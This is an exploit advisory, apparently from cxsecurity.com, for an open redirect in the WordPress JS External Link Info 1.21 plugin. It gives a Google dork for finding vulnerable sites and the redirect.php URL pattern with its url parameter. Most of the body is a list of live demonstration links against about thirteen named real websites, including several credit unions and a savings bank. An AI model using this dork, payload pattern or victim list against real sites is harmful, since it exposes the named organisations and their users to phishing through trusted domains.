WordPress JS External Link Info 1.21 Open Redirect

2016.01.12
Credit: Ashiyane Digital Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601
Dork: inurl:/wp-content/plugins/wp-js-external-link-info/redirect.php

[#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%] ~# : ~# : Exploit Title : Wordpress Js External Link Info Open Redirect ~# : ~# : Exploit Author : Ashiyane Digital Security Team ~# : ~# : Date: 11 01 2016 ~# : ~# : Tested On : Windows / Linux / OSX ~# : ~# : Vender : Wordpress.org ~# : ~# : Version : 1.21 ~# : ~# : Google Dork : inurl:/wp-content/plugins/wp-js-external-link-info/redirect.php ~# : [#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%] Location : [Site].com/[Path]wp-content/plugins/wp-js-external-link-info/redirect.php?blog=[BLOG]&url=[URL] [#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%] [+] Demo : http://l5l5.net/blog/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%D8%AA%D8%AD%D9%85%D9%8A%D9%84%20%D8%A8%D8%B1%D8%A7%D9%85%D8%AC%20%D9%85%D8%AC%D8%A7%D9%86%D9%8A%D8%A9%20%D8%AC%D8%AF%D9%8A%D8%AF%D8%A9%202015&url=http://google.com http://thfcu.org/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Two%20Harbors%20Federal%20Credit%20Union&url=http://google.com https://pneumonie.nl/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Pneumonie&url=http://google.com http://timefederalsavings.com/newsite2/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=time+federal+savings+bank&url=http://google.com http://hefcu.org/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Halliburton20FCU&url=http://google.com http://accordnetwork.org/forum/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Forum+2011&url=http://google.com http://sattvadevi.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Sattva+Devi&url=http://google.com http://frankenberg.feg.de/Wordpress/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=FeG Frankenberg&url=http://google.com http://ilikesharepoint.de/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=..:: I like SharePoint ::..&url=http://google.com http://almraah.com/wp-content/plugins/wp-js-external-link-info/redirect.php?url=http://google.com http://midnight-gaming.de/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Midnight%20Gaming&url=http://google.com http://kneelatthecross.com/testblog/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=Faith%20hope%20and%20love&url=http://google.com http://tworzenie-gier.pl/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=tworzenie+gier&url=http://google.com [#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%] ~# : Developed by: Cloner-47 [#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%][#][%]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top